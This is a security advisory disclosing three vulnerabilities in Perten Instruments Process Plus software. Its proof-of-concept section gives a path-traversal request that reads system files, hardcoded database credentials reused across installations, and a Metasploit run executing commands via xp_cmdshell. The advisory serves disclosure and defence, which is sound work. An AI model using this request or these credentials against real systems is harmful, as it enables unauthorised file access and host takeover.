Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials

`CyberDanube Security Research 20240722-0  
-------------------------------------------------------------------------------  
title| Multiple Vulnerabilities  
product| Perten Instruments Process Plus Software  
vulnerable version| <=1.11.6507.0  
fixed version| 2.0.0  
CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913  
impact| High  
homepage| https://perkinelmer.com  
found| 2024-04-24  
by| S. Dietz, T. Weber (Office Vienna)  
| CyberDanube Security Research  
| Vienna | St. Pölten  
|  
| https://www.cyberdanube.com  
-------------------------------------------------------------------------------  
  
Vendor description  
-------------------------------------------------------------------------------  
"For 85 years, PerkinElmer has pushed the boundaries of science from food to  
health to the environment. We’ve always pursued science with a clear purpose –  
to help our customers achieve theirs. Our expert team brings technology and  
intangibles, like creativity, empathy, diligence, and a spirit of  
collaboration, in equal measure, to fulfill our customers’ desire to work  
better, innovate better, and create better.  
  
PerkinElmer is a leading, global provider of technology and service solutions  
that help customers measure, quantify, detect, and report in ways that help  
ensure the quality, safety, and satisfaction of their products."  
  
Source: https://www.perkinelmer.com/  
  
Vulnerable versions  
-------------------------------------------------------------------------------  
ProcessPlus Software / <=1.11.6507.0  
  
Vulnerability overview  
-------------------------------------------------------------------------------  
1) Unauthenticated Local File Inclusion (CVE-2024-6911)  
A LFI was identified in the web interface of the device. An attacker can use  
this vulnerability to read system-wide files and configuration.  
  
2) Hardcoded MSSQL Credentials (CVE-2024-6912)  
The software is using the same MSSQL credentials across multiple installations.  
In combination with 3), this allows an attacker to fully compromise the host.  
  
3) Execution with Unnecessary Privileges (CVE-2024-6913)  
The software uses the user "sa" to connect to the database. Access to this  
account allows an attacker to execute commands via the "xp_cmdshell" procedure.  
  
  
Proof of Concept  
-------------------------------------------------------------------------------  
1) Unauthenticated Local File Inclusion (CVE-2024-6911)  
The LFI can be triggered by using the following GET Request:  
-------------------------------------------------------------------------------  
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1  
Host: 192.168.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Upgrade-Insecure-Requests: 1  
-------------------------------------------------------------------------------  
This example returns the content from "C:\Windows\System32\drivers\etc\hosts"  
of an affected installation.  
  
2) Hardcoded MSSQL Credentials (CVE-2024-6912)  
Analysis across multiple installations show that the configuration file  
"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:  
-------------------------------------------------------------------------------  
[...]  
<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;  
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"  
appid="Perten.OPCDA.Server" loglevel="info"  
logfile="C:\Perten\ProcessPlus\Log\opcserver.log">  
[...]  
-------------------------------------------------------------------------------  
These credentials "sa:enilno" were re-used in all reviewed installations.  
  
3) Execution with Unnecessary Privileges (CVE-2024-6913)  
The application uses the "sa" user to authenticate with the database. By using  
Metasploit an attacker can execute arbitrary commands:  
-------------------------------------------------------------------------------  
msf6 auxiliary(admin/mssql/mssql_exec) > show options  
  
Module options (auxiliary/admin/mssql/mssql_exec):  
  
Name Current Setting  
---- ---------------  
CMD dir  
PASSWORD enilno  
RHOSTS 192.168.0.1  
RPORT 1433  
TDSENCRYPTION false  
TECHNIQUE xp_cmdshell  
USERNAME sa  
USE_WINDOWS_AUTHENT false  
  
msf6 auxiliary(admin/mssql/mssql_exec) > run  
[*] Running module against 192.168.0.1  
  
[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'  
  
[...]  
Directory of C:\Windows\system32  
01/23/2024 13:37 AM <DIR> .  
01/23/2024 13:37 AM <DIR> ..  
01/23/2024 13:37 AM <DIR> 0123  
01/23/2024 13:37 AM <DIR> 0123  
01/23/2024 13:37 AM 232 @AppHelpToast.png  
01/23/2024 13:37 AM 308 @AudioToastIcon.png  
[...]  
  
  
Solution  
-------------------------------------------------------------------------------  
Update to version 2.0.0.  
  
Workaround  
-------------------------------------------------------------------------------  
Restrict network access to the host with the installed software. Change the  
default credentials of the database in the config file and the database itself.  
  
  
Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends Perten customers to upgrade the software to the latest  
version available and to restrict network access to the management interface.  
  
  
Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-29: Contacting PerkinElmer via [email protected].  
2024-05-13: Vendor asked for unencrypted advisory.  
2024-05-16: Sent advisory to vendor.  
2024-05-22: Asked for status update. No answer.  
2024-05-28: Asked for status update. Contact stated that they are working on a  
fix.  
2024-06-10: Asked for status update. Contact stated that all issues should be  
fixed by end of month. Local file inclusion should be fixed in  
version 1.16. Asked for a release date of version 1.16. No answer.  
2024-07-13: Asked for status update.  
2024-07-15: Contact stated, that all three issues have been fixed in version  
2.0.0 which have been released on 2024-07-11.  
2024-07-16: Asked for a link to the firmware update release.  
2024-07-17: Set release date to 2024-07-22.  
2024-07-22: Coordinated release of security advisory.  
  
  
Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com  
  
EOF S. Dietz, T. Weber / @2024  
  
`